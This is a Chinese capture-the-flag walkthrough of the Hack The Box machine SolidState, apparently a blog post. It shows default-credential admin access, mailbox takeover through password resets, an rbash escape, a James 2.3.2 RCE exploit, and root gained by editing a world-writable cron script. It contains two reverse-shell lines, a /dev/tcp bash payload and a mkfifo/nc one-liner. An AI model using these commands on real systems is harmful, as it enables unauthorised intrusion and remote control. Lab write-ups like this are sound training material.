免责声明
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责
探测
开放端口
┌──(root㉿ss)-[~/htb/SolidState]
└─# nmap -p- --open --min-rate=1000 10.10.10.51 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 10:59 EDT
Nmap scan report for 10.10.10.51
Host is up (0.0039s latency).
Not shown: 64351 closed tcp ports (reset), 1178 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Nmap done: 1 IP address (1 host up) scanned in 16.29 seconds
详细端口信息
┌──(root㉿ss)-[~/htb/SolidState]
└─# nmap -sV -Pn -A -O 10.10.10.51 -p 22,25,80,110,119,4555
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 11:00 EDT
Stats: 0:01:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.10.10.51
Host is up (0.0081s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.10 [10.10.14.10]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 JAMES pop3d 2.3.2
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
119/tcp open nntp JAMES nntpd (posting ok)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.92%I=7%D=5/30%Time=6294DC0C%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 2.97 ms 10.10.14.1
2 3.58 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.85 seconds
web
┌──(root㉿ss)-[~/htb/SolidState]
└─# python3 /root/dirsearch/dirsearch.py -e* -u http://10.10.10.51
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.51/_22-05-30_11-02-56.txt
Error Log: /root/dirsearch/logs/errors-22-05-30_11-02-56.log
Target: http://10.10.10.51/
[11:02:56] Starting:
[11:03:02] 200 - 17KB - /LICENSE.txt
[11:03:03] 200 - 963B - /README.txt
[11:03:14] 200 - 7KB - /about.html
[11:03:39] 200 - 1KB - /assets/
[11:03:39] 301 - 311B - /assets -> http://10.10.10.51/assets/
[11:04:18] 200 - 2KB - /images/
[11:04:18] 301 - 311B - /images -> http://10.10.10.51/images/
[11:04:19] 200 - 8KB - /index.html
4555
nma结果显示4555端口需要一个登陆的东西
使用默认账号:root:root成功登陆
┌──(root💀kali)-[~/htb/SolidState]
└─# nc -v 10.10.10.51 4555
10.10.10.51 [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
列出所有用户名
┌──(root💀kali)-[~/htb/SolidState]
└─# nc -v 10.10.10.51 4555 130 ⨯
10.10.10.51 [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
修改john的密码
┌──(root💀kali)-[~/htb/SolidState]
└─# nc -v 10.10.10.51 4555
10.10.10.51 [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
setpassword thomas 123456
Password for thomas reset
setpassword john 123456
Password for john reset
登陆john的邮箱,有一封信件
┌──(root💀kali)-[~/htb/SolidState]
└─# telnet 10.10.10.51 110 1 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass 123456
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
看来mindy的邮箱会有登录信息
修改mindy的邮箱密码,登录,有两封邮件
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
第一封
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
第二封,暴露出了登录信息
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
ssh登录,拿到foothold
┌──(root💀kali)-[~/htb/SolidState]
└─# ssh mindy@10.10.10.51 255 ⨯
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
拿到user.txt
mindy@solidstate:~$ ls
bin user.txt
mindy@solidstate:~$ cat user.txt
07f110ad2ba2....
由上可知,我们当前是一个限制的rbash shell
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
可以使用的命令只有3个
mindy@solidstate:~$ ls /home/mindy/bin
cat env ls
rbash 逃逸
方法1
这个我是看0xdf的wp学到的,使用ssh登录时指定bash
┌──(root💀kali)-[~/htb/SolidState]
└─# sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51 -t bash 127 ⨯
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
方法2
查看4555这个服务,貌似存在RCE
┌──(root💀kali)-[~/htb]
└─# searchsploit JAMES Remote 2.3.2
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) | linux/remote/50347.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
使用50347.py
┌──(root💀kali)-[~/htb/SolidState]
└─# python3 50347.py 10.10.10.51 10.10.16.4 443
[+]Payload Selected (see script for more options): /bin/bash -i >& /dev/tcp/10.10.16.4/443 0>&1
[+]Example netcat listener syntax to use after successful execution: nc -lvnp 443
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).
[+]Don't forget to start a listener on port 443 before logging in!
这个exp的利用原理是写bash文件到/etc/bash_completion.d这个文件夹
任何用户登录ssh,上面文件夹里的文件都会当成bash被执行一遍
现在我们监听本地端口443,只要ssh登录一下就能触发反弹
拿到反弹shell
┌──(root💀kali)-[~/htb/SolidState]
└─# nc -lnvp 443 130 ⨯
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.51] 48296
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
提权
在opt文件夹找到一个tmp.py文件(这个文件在linpeas没有枚举出来。。找了半天提权方法)
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls
ls
james-2.3.2 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 root root 4.0K Aug 22 2017 .
drwxr-xr-x 22 root root 4.0K May 27 11:05 ..
drwxr-xr-x 11 root root 4.0K Apr 26 2021 james-2.3.2
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
文件属主是root,看起来像是定期清理tmp下面的所有文件
替换成下面文件
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 443 >/tmp/f ')
except:
sys.exit()
等待几分钟,拿到root shell
┌──(root💀kali)-[~]
└─# nc -lnvp 443 1 ⨯
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.51] 55476
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cat /root/root.txt
7fd6f62f8dd26e...
#
网友评论